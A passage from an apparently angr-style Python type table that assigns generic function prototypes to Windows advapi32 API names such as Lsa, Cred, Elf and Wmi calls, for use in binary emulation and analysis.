"I_ScSetServiceBitsA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiOpenBlock": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetAccessPermissionsForObjectA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaICLookupNames": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UnregisterIdleTask": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction025": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfRegisterEventSourceA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction010": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiMofEnumerateResourcesA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSDToStringSDRootDomainW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"A_SHAFinal": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetSecurityObject": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetSystemAccessAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiFileHandleToInstanceNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"FreeEncryptedFileKeyInfo": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaGetRemoteUserName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EventWriteStartScenario": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction014": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"AddUsersToEncryptedFileEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfRegisterEventSourceW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredEncryptAndMarshalBinaryBlob": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiPopulateDefaultsInRegistry": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiSearchMatchingHashRules": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaGetSystemAccessAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReadEventLogW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiExecuteMethodA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiSetSingleInstanceA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaLookupPrivilegeValue": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiSetSingleItemW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryAllDataA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredBackupCredentials": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertStringSDToSDRootDomainW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaCreateTrustedDomain": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetAccessPermissionsForObjectW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReportEventW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetSecurityInfoExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction015": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfCloseEventLog": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UsePinForEncryptedFilesW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaManageSidNameMapping": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredProfileUnloaded": SimTypeFunction([], SimTypeLong(signed=True)),
"SystemFunction007": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiSetSingleItemA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNamedSecurityInfoExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiFileHandleToInstanceNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiChangeRegistryScope": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD5Init": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScPnPGetServiceName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpConvertTargetInfo": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetSecurityInfoExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsValidRelativeSecurityDescriptor": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpDecodeCredential": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScSetServiceBitsW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterIdleTask": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction017": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction033": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CancelOverlappedAccess": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"TrusteeAccessToObjectW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaOpenSecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EventWriteEndScenario": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ComputeAccessTokenFromCodeAuthzLevel": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaGetQuotasForAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScIsSecurityProcess": SimTypeFunction([], SimTypeLong(signed=True)),
"SetNamedSecurityInfoExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction019": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryAllDataMultipleW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfDeregisterEventSource": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfClearEventLogFileA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertAccessToSecurityDescriptorA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction016": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiMofEnumerateResourcesW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiNotificationRegistrationA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaAddPrivilegesToAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction003": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction020": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction006": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertStringSDToSDRootDomainA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertStringSDToSDDomainW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSecurityDescriptorToAccessNamedA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaRemovePrivilegesFromAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQuerySingleInstanceW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ProcessIdleTasks": SimTypeFunction([], SimTypeLong(signed=True)),
"ConvertStringSDToSDDomainA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetEntriesInAuditListA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NotifyServiceStatusChange": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaQuerySecurityObject": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfBackupEventLogFileA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction018": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiIsDllAllowed": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiCloseBlock": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction035": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiSetSingleInstanceW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpEncodeCredential": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryAllDataMultipleA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction030": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaOpenTrustedDomain": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction005": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction012": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction031": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetEntriesInAuditListW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScGetCurrentGroupStateW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetNamedSecurityInfoExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfNumberOfRecords": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaClearAuditLog": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CreateCodeAuthzLevel": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD5Update": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfFlushEventLog": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MakeAbsoluteSD2": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiCompareTokenLevels": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetEntriesInAccessListA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction008": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"FlushEfsCache": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSecurityDescriptorToAccessNamedW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaCreateAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaEnumerateAccounts": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryGuidInformation": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_QueryTagInformation": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetInformationCodeAuthzLevelW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaQueryInfoTrustedDomain": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction028": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQuerySingleInstanceMultipleW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiReceiveNotificationsW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetInformationTrustedDomain": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScValidatePnPService": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReportEventAndSourceW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSDToStringSDRootDomainA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"TrusteeAccessToObjectA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD4Init": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetOverlappedAccessResults": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LogonUserExExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaLookupPrivilegeName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaOpenAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredRestoreCredentials": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScSendTSMessage": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaLookupPrivilegeDisplayName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScSendPnPMessage": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaICLookupSids": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction034": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiRecordEventLogEntry": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction026": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOpenBackupEventLogA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction029": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetSecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReadEventLogA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpConvertCredential": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSecurityDescriptorToAccessW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaICLookupSidsWithCreds": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetSecurityInfoExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction001": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UsePinForEncryptedFilesA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaQuerySecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaEnumeratePrivileges": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction032": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetInformationCodeAuthzPolicyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpEncodeSecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOpenBackupEventLogW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IdentifyCodeAuthzLevelW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction009": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"A_SHAUpdate": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaDelete": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfClearEventLogFileW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetInformationCodeAuthzPolicyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScQueryServiceConfig": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiDevInstToInstanceNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction022": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
